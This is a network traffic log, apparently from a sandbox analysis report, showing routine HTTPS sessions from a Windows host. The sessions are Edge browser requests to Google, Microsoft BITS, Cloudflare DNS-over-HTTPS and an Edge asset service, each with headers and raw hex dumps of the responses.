3OT`0YFT43thy}pL2S&i`ofoHN:ijT3F{0,f?'fCQt;b_"Pc

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.7	49769	142.250.80.68	443	2332	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-06 07:58:22 UTC	881	OUT	GET /favicon.ico HTTP/1.1 Host: www.google.com Connection: keep-alive sec-ch-ua: "Not;A=Brand";v="8", "Chromium";v="117", "Google Chrome";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-arch: "x86" sec-ch-ua-full-version: "117.0.5938.132" sec-ch-ua-platform-version: "10.0.0" sec-ch-ua-full-version-list: "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132", "Google Chrome";v="117.0.5938.132" sec-ch-ua-bitness: "64" sec-ch-ua-model: "" sec-ch-ua-wow64: ?0 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://accounts.google.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-09-06 07:58:23 UTC	705	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="static-on-bigtable" Report-To: {"group":"static-on-bigtable","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/static-on-bigtable"}]} Content-Length: 5430 X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Date: Fri, 06 Sep 2024 07:34:55 GMT Expires: Sat, 14 Sep 2024 07:34:55 GMT Cache-Control: public, max-age=691200 Last-Modified: Tue, 22 Oct 2019 18:30:00 GMT Content-Type: image/x-icon Vary: Accept-Encoding Age: 1408 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-09-06 07:58:23 UTC	685	IN	Data Raw: 00 00 01 00 02 00 10 10 00 00 01 00 20 00 68 04 00 00 26 00 00 00 20 20 00 00 01 00 20 00 a8 10 00 00 8e 04 00 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 20 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 30 fd fd fd 96 fd fd fd d8 fd fd fd f9 fd fd fd f9 fd fd fd d7 fd fd fd 94 fe fe fe 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fe fe fe 09 fd fd fd 99 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd 95 ff ff ff 08 00 00 00 00 00 00 00 00 00 00 00 00 fe fe fe 09 fd fd fd c1 ff ff ff ff fa fd f9 ff b4 d9 a7 ff 76 ba 5d ff 58 ab 3a ff 58 aa 3a ff 72 b8 59 ff ac d5 9d ff f8 fb f6 ff ff Data Ascii: h& ( 0.v]X:X:rY
2024-09-06 07:58:23 UTC	1390	IN	Data Raw: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd d8 fd fd fd 99 ff ff ff ff 92 cf fb ff 37 52 ec ff 38 46 ea ff d0 d4 fa ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd 96 fe fe fe 32 ff ff ff ff f9 f9 fe ff 56 62 ed ff 35 43 ea ff 3b 49 eb ff 95 9c f4 ff cf d2 fa ff d1 d4 fa ff 96 9d f4 ff 52 5e ed ff e1 e3 fc ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 30 00 00 00 00 fd fd fd 9d ff ff ff ff e8 ea fd ff 58 63 ee ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 6c 76 f0 ff ff ff ff ff ff ff ff ff fd fd fd 98 00 00 00 00 00 00 00 00 ff ff ff 0a fd fd fd c3 ff ff ff ff f9 f9 fe ff a5 ac f6 ff 5d 69 ee ff 3c 4a Data Ascii: 7R8F2Vb5C;IR^0Xc5C5C5C5C5C5Clv]i<J
2024-09-06 07:58:23 UTC	1390	IN	Data Raw: ff ff ff ff ff ff ff ff ff ff ff fd fd fd d0 ff ff ff 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fd fd fd 8b ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff b1 d8 a3 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 60 a5 35 ff ca 8e 3e ff f9 c1 9f ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd 87 00 00 00 00 00 00 00 00 00 00 00 00 fe fe fe 25 fd fd fd fb ff ff ff ff ff ff ff ff ff ff ff ff c2 e0 b7 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 6e b6 54 ff 9f ce 8d ff b7 da aa ff b8 db ab ff a5 d2 95 ff 7b bc 64 ff 54 a8 35 ff 53 a8 34 ff 77 a0 37 ff e3 89 41 ff f4 85 42 ff f4 85 42 ff Data Ascii: S4S4S4S4S4S4S4S4S4S4S4S4S4S4`5>%S4S4S4S4S4S4nT{dT5S4w7ABB
2024-09-06 07:58:23 UTC	1390	IN	Data Raw: ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff fb d5 bf ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd ea fd fd fd cb ff ff ff ff ff ff ff ff ff ff ff ff 46 cd fc ff 05 bc fb ff 05 bc fb ff 05 bc fb ff 21 ae f9 ff fb fb ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd c8 fd fd fd 9c ff ff ff ff ff ff ff ff ff ff ff ff 86 df fd ff 05 bc fb ff 05 bc fb ff 15 93 f5 ff 34 49 eb ff b3 b8 f7 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff Data Ascii: BBBBBBF!4I
2024-09-06 07:58:23 UTC	575	IN	Data Raw: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd d2 fe fe fe 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 0a fd fd fd 8d fd fd fd fc ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd fb fd fd fd 8b fe fe fe 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fe fe fe 27 fd fd fd 9f fd fd fd f7 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff Data Ascii: $'

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.7	49772	184.28.90.27	443

Timestamp	Bytes transferred	Direction	Data
2024-09-06 07:58:23 UTC	239	OUT	GET /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT Range: bytes=0-2147483646 User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-09-06 07:58:23 UTC	514	IN	HTTP/1.1 200 OK ApiVersion: Distribute 1.1 Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json Content-Type: application/octet-stream ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Last-Modified: Tue, 16 May 2017 22:58:00 GMT Server: ECAcc (lpl/EF06) X-CID: 11 X-Ms-ApiVersion: Distribute 1.2 X-Ms-Region: prod-weu-z1 Cache-Control: public, max-age=31691 Date: Fri, 06 Sep 2024 07:58:23 GMT Content-Length: 55 Connection: close X-CID: 2
2024-09-06 07:58:23 UTC	55	IN	Data Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.7	49773	172.64.41.3	443	2332	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-06 07:58:23 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2024-09-06 07:58:23 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 04 65 64 67 65 09 6d 69 63 72 6f 73 6f 66 74 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 51 00 0c 00 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: edgemicrosoftcom)QM
2024-09-06 07:58:24 UTC	247	IN	HTTP/1.1 200 OK Server: cloudflare Date: Fri, 06 Sep 2024 07:58:23 GMT Content-Type: application/dns-message Connection: close Access-Control-Allow-Origin: * Content-Length: 468 CF-RAY: 8bece9e7cf39c477-EWR alt-svc: h3=":443"; ma=86400
2024-09-06 07:58:24 UTC	468	IN	Data Raw: 00 00 81 80 00 01 00 04 00 00 00 01 04 65 64 67 65 09 6d 69 63 72 6f 73 6f 66 74 03 63 6f 6d 00 00 01 00 01 c0 0c 00 05 00 01 00 00 0d f6 00 2d 12 65 64 67 65 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 0b 64 75 61 6c 2d 61 2d 30 30 33 36 08 61 2d 6d 73 65 64 67 65 03 6e 65 74 00 c0 30 00 05 00 01 00 00 00 22 00 02 c0 43 c0 43 00 01 00 01 00 00 00 22 00 04 cc 4f c5 ef c0 43 00 01 00 01 00 00 00 22 00 04 0d 6b 15 ef 00 00 29 04 d0 00 00 00 00 01 3e 00 0c 01 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: edgemicrosoftcom-edge-microsoft-comdual-a-0036a-msedgenet0"CC"OC"k)>:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.7	49774	172.64.41.3	443	2332	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-06 07:58:23 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2024-09-06 07:58:23 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 04 65 64 67 65 09 6d 69 63 72 6f 73 6f 66 74 03 63 6f 6d 00 00 41 00 01 00 00 29 10 00 00 00 00 00 00 51 00 0c 00 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: edgemicrosoftcomA)QM
2024-09-06 07:58:24 UTC	247	IN	HTTP/1.1 200 OK Server: cloudflare Date: Fri, 06 Sep 2024 07:58:23 GMT Content-Type: application/dns-message Connection: close Access-Control-Allow-Origin: * Content-Length: 468 CF-RAY: 8bece9e7ff08c34b-EWR alt-svc: h3=":443"; ma=86400
2024-09-06 07:58:24 UTC	468	IN	Data Raw: 00 00 81 80 00 01 00 01 00 01 00 01 04 65 64 67 65 09 6d 69 63 72 6f 73 6f 66 74 03 63 6f 6d 00 00 41 00 01 c0 0c 00 05 00 01 00 00 0d d8 00 2d 12 65 64 67 65 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 0b 64 75 61 6c 2d 61 2d 30 30 33 36 08 61 2d 6d 73 65 64 67 65 03 6e 65 74 00 c0 4f 00 06 00 01 00 00 00 b8 00 23 03 6e 73 31 c0 4f 06 6d 73 6e 68 73 74 c0 11 78 2b 22 e5 00 00 07 08 00 00 03 84 00 24 ea 00 00 00 00 f0 00 00 29 04 d0 00 00 00 00 01 3d 00 0c 01 39 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: edgemicrosoftcomA-edge-microsoft-comdual-a-0036a-msedgenetO#ns1Omsnhstx+"$)=9

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.7	49783	13.107.246.40	443	2332	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-06 07:58:25 UTC	470	OUT	GET /assets/edge_hub_apps_manifest_gz/4.7.107/asset?assetgroup=Shoreline HTTP/1.1 Host: edgeassetservice.azureedge.net Connection: keep-alive Edge-Asset-Group: Shoreline Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-09-06 07:58:25 UTC	577	IN	HTTP/1.1 200 OK Date: Fri, 06 Sep 2024 07:58:25 GMT Content-Type: application/octet-stream Content-Length: 306698 Connection: close Content-Encoding: gzip Last-Modified: Tue, 10 Oct 2023 17:24:31 GMT ETag: 0x8DBC9B5C40EBFF4 x-ms-request-id: a05cbbc2-a01e-0025-3785-fef0b4000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob x-azure-ref: 20240906T075825Z-16579567576c4hpgz3uh2pbn5g0000000dk00000000087tw Cache-Control: public, max-age=604800 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-09-06 07:58:25 UTC	15807	IN	Data Raw: 1f 8b 08 08 cf 88 25 65 02 ff 61 73 73 65 74 00 ec 7d 69 93 db 46 92 e8 5f a9 f0 97 fd e0 96 05 10 00 09 4c c4 8b 17 2d f9 92 6d f9 92 6d 8d fd 66 43 51 00 0a 24 9a 20 40 e1 60 ab 7b 76 fe fb ab cc 2c 10 09 82 07 c8 a6 bc 9e 8d 0d 5b 68 b0 8e bc eb 44 55 e6 3f 3f 59 c9 3c 4d 54 55 bf db a8 b2 4a 8b fc 93 bf 89 4f dc cf ac cf ac 4f 6e c4 27 8b 26 7c 27 d7 eb 4a 27 fe bf 7f 7e 92 c6 90 19 c5 ee d4 f7 65 f0 4c f9 be ff cc f5 95 7c 26 63 df 7e 36 9b da 81 13 7b d3 d0 0e 15 d4 cd e5 4a 41 f9 77 ef 5e bf f9 ea 1d fc 7a f7 0e d2 19 1e fb 33 fd df 0c 12 63 55 45 65 ba ae 4d 06 d5 61 89 54 75 a9 1e 20 f7 f5 ab 57 2f 5e dd dd 7e ff 62 be 7c bf 58 a6 5f 05 f7 d6 8b db 9f be f8 f2 f6 f6 87 97 b7 3f f9 b7 90 ff 72 fe ad 7e ff e2 76 9d 58 77 ee 57 8b 1f de ff 14 f9 fe Data Ascii: %easset}iF_L-mmfCQ$ @`{v,[hDU??Y<MTUJOOn'&\|'J'~eL\|&c~6{JAw^z3cUEeMaTu W/^~b\|X_?r~vXwW
2024-09-06 07:58:25 UTC	16384	IN	Data Raw: 04 ba b8 75 26 ce 55 c2 08 bf 5c 90 e7 68 0d 8c 7c 07 bb 14 ee 07 cf ac 5b ca 81 54 5b 25 f6 36 51 93 15 e8 c2 2b 22 50 fc 52 36 6d 55 35 59 19 67 e4 56 be d8 2d df fd 8c 1c b1 48 e9 85 d8 d5 6f a1 88 16 05 b8 ea d5 42 20 2f c6 fa c5 ab 21 ae b4 7e 71 4c 7c 69 3b da be 2c c4 3c 45 31 58 f6 5a d0 75 29 2d 10 91 2f b6 81 a8 f1 77 27 4d cb 46 c3 d1 f2 cb e7 17 7d 3c d0 6a 30 b1 ed 19 11 24 85 30 ed b3 77 98 0a a3 d3 4d 8a a4 58 a6 1a 92 6f 39 a0 66 5b a9 58 c4 f8 d7 db 13 a4 38 9f 53 18 72 e3 d6 58 c9 9c 2a 85 f1 21 3d 9d 12 35 51 d6 f4 74 9e 6e f9 3a 6f 4c fc e5 2c 53 f9 7a 94 a9 7c 50 ab 8e d8 56 01 86 95 11 92 ce 4d 82 a9 12 26 c6 7f 9c 55 b4 0d eb a8 c4 4f 75 f1 df 12 7e 7b 85 2d 18 bd 99 6f 4d 95 18 8d 35 7f b9 51 da bc b3 17 f2 61 66 41 16 70 9d 0a 0c Data Ascii: u&U\h\|[T[%6Q+"PR6mU5YgV-HoB /!~qL\|i;,<E1XZu)-/w'MF}<j0$0wMXo9f[X8SrX*!=5Qtn:oL,Sz\|PVM&UOu~{-oM5QafAp
2024-09-06 07:58:25 UTC	16384	IN	Data Raw: b7 2c 9c d4 28 cd 82 09 ad 54 24 d2 ae 26 b9 4f 37 c4 67 1e 9d 6b d1 e4 03 44 91 0f c7 24 3e 9c a5 f8 80 ce e1 c3 bd 55 1f 7c 0d 7d f0 d6 f4 e1 f6 6d f9 6c 42 78 a7 7a 8f cf 80 2a 42 b1 ca af 46 95 01 06 85 53 be 7a 50 c8 12 ce 7e 7c 44 29 29 63 83 14 66 50 e5 69 9e ba 94 a2 14 a9 44 53 56 22 78 06 d0 d3 7d 25 3d 51 7e fc 63 e8 77 69 11 9c 24 cb 92 42 e9 e0 d4 ac cc c6 c2 0a 92 55 72 f4 61 88 91 31 1f 4c 69 b4 9b 0f a5 64 32 91 6a 99 5a 87 05 9b b8 18 4d b6 69 0c 05 60 46 80 c2 34 75 85 d5 88 cf a4 31 10 78 28 99 44 01 7e 6d 51 37 26 3d f1 aa c8 64 77 98 90 c3 4a 88 b9 d5 8c 73 bc 9b 5c 69 65 23 a6 fb 16 9b 26 25 05 ac fc cc 1e 87 56 e3 bd 7f 86 8d d9 de 4d 93 29 aa 7c fe d1 06 5b da c5 90 55 b0 c9 33 35 1b d9 51 ad b2 ea c6 9a c4 a2 90 04 54 de 86 42 2d Data Ascii: ,(T$&O7gkD$>U\|}mlBxz*BFSzP~\|D))cfPiDSV"x}%=Q~cwi$BUra1Lid2jZMi`F4u1x(D~mQ7&=dwJs\ie#&%VM)\|[U35QTB-
2024-09-06 07:58:25 UTC	16384	IN	Data Raw: 2a 42 7f 7e 14 be 1b ef d2 39 b9 d3 a0 0f a6 db fd c0 cf 6a 73 b5 e6 a0 67 39 bd 50 cf ce e5 f5 33 b4 5b f6 96 18 f6 1d 3d 5b 1c 62 ee 08 9c b4 27 31 5c bf 95 0d 07 a0 cf bc bf ec e9 f3 e3 25 7d d1 cd 7e e8 fe 69 3f 94 32 74 6d 41 40 30 f4 9d 21 ef 18 ab 09 e0 e5 30 bf 56 97 43 99 8d fb 5c b1 3a 15 2a 0c 9d 5f c9 d3 47 70 60 b0 6e 17 9c 16 bc 33 94 8f dc 87 1c 2e 65 5f 80 b0 c7 e2 bb 6a f4 3b c8 60 00 83 b2 83 02 16 e1 3f 69 68 e4 62 45 17 99 ba 9d 9d b7 00 7d 2a 5a 5f 88 af 8b 22 5d 84 79 61 b8 38 c9 2f d4 62 3c 2f ee 0a 38 04 98 69 d8 af 45 cf 43 a8 9b 3e 6e dd 69 b8 01 0b 4d c5 2a d4 d8 5d 7a b1 5f 94 d0 5d 79 e7 c9 87 c6 d5 b9 5d 89 1b 44 f3 5a 14 67 85 e9 1a ef c2 74 b9 63 86 3e c2 71 a7 08 94 eb 44 58 ad 1a 5c 09 02 5c 4d 1b c8 2c 53 c1 71 b8 50 80 Data Ascii: B~9jsg9P3[=[b'1\%}~i?2tmA@0!0VC\:_Gp`n3.e_j;`?ihbE}Z_"]ya8/b</8iEC>niM]z_]y]DZgtc>qDX\\M,SqP
2024-09-06 07:58:25 UTC	16384	IN	Data Raw: c2 6b ad 8a 70 f5 34 6b b8 40 3f ab 6c ff 6b b9 2f c1 49 79 7f 7f fe e2 4d 8e 52 97 9f 5c d2 a4 d2 9b 7f 21 19 ca ff db 31 e3 e4 f2 51 b8 7c 74 b3 4c aa e5 59 09 49 a3 cf 51 d6 87 a5 4c 6d 23 e7 30 3b 3e ce a2 ff dd d2 a2 4d 1f 0e 14 fd d7 52 7f fd 1c ea cf 13 55 dc a3 6d 85 4b 4e 63 b4 12 03 65 33 26 36 bd 72 f4 19 04 1a d9 86 f6 84 1c dd 9e ee 21 e8 65 4d aa 2f f0 f8 0a fb d1 85 1e 53 4d 3f 5f a5 fc d4 0d f8 28 79 f7 b1 c1 a5 fc 51 df bc 30 df bf cb 6f cb 2a 09 d7 1f 99 f4 19 6a 7e d9 a5 f8 7e 7b c5 59 31 55 b2 99 9f 7d 02 06 e8 6e c6 98 ec a9 7c 3f 2a 1d 34 e5 bd 0a 8f e7 88 3e 74 c3 0b e7 6b 10 2c 4f 53 5d 7c 86 e2 09 77 99 7d ee 02 3a 9d f3 a7 29 a2 13 79 ee 15 d2 a7 37 fd 67 b6 f7 67 33 72 df b2 23 59 ef 55 5d e5 6f cb 55 7e 43 6c b7 99 fc 2e 56 9e Data Ascii: kp4k@?lk/IyMR\!1Q\|tLYIQLm#0;>MRUmKNce3&6r!eM/SM?_(yQ0oj~~{Y1U}n\|?4>tk,OS]\|w}:)y7gg3r#YU]oU~Cl.V
2024-09-06 07:58:25 UTC	16384	IN	Data Raw: 1d c0 e5 f5 0e 81 86 cd d1 7b 9c 8b 16 07 4d 31 65 8e 49 77 c3 9c 0b 06 79 cd 66 e0 72 84 3b 54 b9 74 ef 35 53 7d 3b 8c b0 a9 fd 1b 50 a9 de 74 45 72 7e 1b f0 2a c4 ee 75 56 a9 f1 4f 0b e2 ef 4c 0e 04 e6 c1 13 43 d1 a3 91 83 19 d3 3d c4 08 0f b5 d5 e1 f0 41 7b 02 cf 94 80 35 8c 5f 5f 02 90 85 fa 86 bb ab e1 02 93 a8 c3 01 b8 10 ce 1a 84 70 ba 2a 74 48 e2 74 7c 83 87 f5 42 38 70 15 c2 ce 65 08 08 86 a0 47 21 98 5b b8 58 62 21 c8 96 0d 6c 09 61 e7 32 c4 b3 5e a1 8d a0 20 7d 39 b0 28 5c c6 6d 21 84 b7 80 4c dc 70 c4 2e c4 f3 19 21 9c 8e d6 1f 96 d8 f4 9d 32 40 37 a4 47 84 1e d1 c7 65 89 5f 63 82 1d d4 5a 86 2d e5 f8 15 59 45 61 ea 67 ab 2d d9 61 85 e3 91 0f 94 e7 67 25 02 3d 4f 28 55 ad 17 c6 a0 29 6a 5d 21 2a cd 7e af 45 5e 0b 01 e5 6c bb ed 07 fa bc 5c f7 Data Ascii: {M1eIwyfr;Tt5S};PtEr~uVOLC=A{5__ptHt\|B8peG![Xb!la2^ }9(\m!Lp.!2@7Ge_cZ-YEag-ag%=O(U)j]!*~E^l\
2024-09-06 07:58:25 UTC	16384	IN	Data Raw: b4 4f 20 01 c9 6e d7 8b d6 eb 26 ee 09 6d 06 c3 c0 20 42 f6 62 01 a8 b8 2e 41 68 d5 3e af 78 77 09 5e a1 a8 7e 3d bf 65 90 da ff 6d 58 c3 e3 86 29 f6 22 00 98 2a 9c 68 97 65 63 ac 5c ad 09 2b 23 82 8f 3f 2b 34 4c 1f 01 76 0d 06 ed 44 0f a9 a0 b1 63 30 c2 0d f2 ad 15 f9 9d a6 73 4a 64 c6 38 b2 91 d1 0a 38 ec f1 61 a5 51 a1 65 d6 96 da 34 5b b9 be df 70 92 06 98 c1 37 67 b8 7a fd 34 cd 5e 44 c0 aa b0 27 6e 0c f2 e2 f9 5e 7c 0a 17 b4 b4 16 73 66 52 b2 05 40 56 84 20 c3 90 88 0a 5a 8e f1 3d 96 59 b7 5f a7 63 31 3c 17 3a a9 04 30 4b 80 0e 09 8b 60 e1 5d df da 55 e1 6d 20 56 de 3a 5a 4e 4e 36 25 71 5c 12 7e f1 93 97 31 94 a1 29 89 f2 0a 40 a9 02 bf 55 03 2f 98 74 5f 78 73 cb c5 29 4c e9 ad ef d3 e0 e9 ec 15 b9 9a 03 cf 91 db 7e f5 f0 08 3e bd 4a a1 b3 a7 63 d1 Data Ascii: O n&m Bb.Ah>xw^~=emX)"*hec\+#?+4LvDc0sJd88aQe4[p7gz4^D'n^\|sfR@V Z=Y_c1<:0K`]Um V:ZNN6%q\~1)@U/t_xs)L~>Jc
2024-09-06 07:58:25 UTC	16384	IN	Data Raw: e6 2c b7 a9 5c 69 a3 75 af d9 ba f6 11 ea 58 64 70 1a 03 5a 75 5c b5 f2 6d d4 e3 16 ed 7d 0a 76 94 c1 8e a7 30 9e 08 64 07 27 9d 18 c0 52 7d e4 67 ff 5d dd ba 83 b1 dc 5d 98 95 9f fd f7 4f 5a 26 c7 8a 7a a4 2b 67 ea ac d1 ee 4b f3 ee 5b 7c 55 87 5f ce 64 5a d1 d6 85 f4 9d 84 43 1d a5 d1 4e 33 c2 52 b6 ac ef d9 7f de 15 61 44 a2 b6 4f fe 03 39 27 95 29 d1 71 16 47 ff 7e 40 2f ff 09 6e 49 c5 ba 2c 58 72 fd b4 fc 2b 2f d4 a3 80 7f e2 4e fd ca 3b f8 f4 09 87 9a 38 33 24 7f 45 a2 7e d3 4f 4e 87 8c cb 8b 02 7f df 7f ff 57 75 a1 22 3d 51 a9 78 41 7d 1b c5 f8 9b d0 7f 72 fc 7d ff 85 6a 70 ab 5e dc aa 41 ca 56 bd b0 55 00 76 02 c7 a0 ea 57 7d b2 c3 fb 0a b5 58 bd 1f ab f6 63 d5 ec bd 82 b3 c7 5f d5 89 ed 15 3f f6 0a e5 7d 86 bf 7b f2 4f 82 f3 1a ea 09 06 a9 c9 03 Data Ascii: ,\iuXdpZu\m}v0d'R}g]]OZ&z+gK[\|U_dZCN3RaDO9')qG~@/nI,Xr+/N;83$E~ONWu"=QxA}r}jp^AVUvW}Xc_?}{O
2024-09-06 07:58:25 UTC	16384	IN	Data Raw: 34 82 9b a9 e1 c3 b1 e1 46 87 99 95 55 9a b4 be 3b 59 b1 6b f9 9e 4a 6a 38 c3 9d 71 93 60 68 53 6d 70 93 f4 d8 cb 92 d6 1c 64 0c 55 29 d1 f7 86 61 3a 23 da d5 06 e4 b2 85 18 31 bb 0e 46 71 38 52 33 8f 24 f5 9e 43 1a 6d 32 5a be 90 91 0a d3 47 69 32 eb 74 ec 30 03 b3 0a 2f 45 60 14 c3 56 8c 9b d3 2c f6 4c cc 87 6e 54 d0 da 28 ed 5d 8d 3a 4d 4a aa f1 2e 74 2f 9f 56 e9 a4 49 86 4c 15 33 4f 70 79 ad 9c 27 57 fe 5f f1 b5 af dc 2b a5 7e 6a ff d6 06 bc 0c 5d f6 df fe e1 b9 f2 44 21 e0 ef 42 ef 50 c9 9d 6d c4 b7 e0 a2 c1 1c b4 2f 36 29 c7 0d cd c5 5f 01 b2 80 f3 b0 10 3b 89 01 c5 9d d8 7c 07 2e 18 db 27 d6 4f f2 63 9c b0 f6 f2 ae c9 8b 6c b2 c4 37 76 c1 ad 55 68 26 ab 9f 6e 0d f6 97 8b d0 7b ae f0 47 ed 5d 9f e5 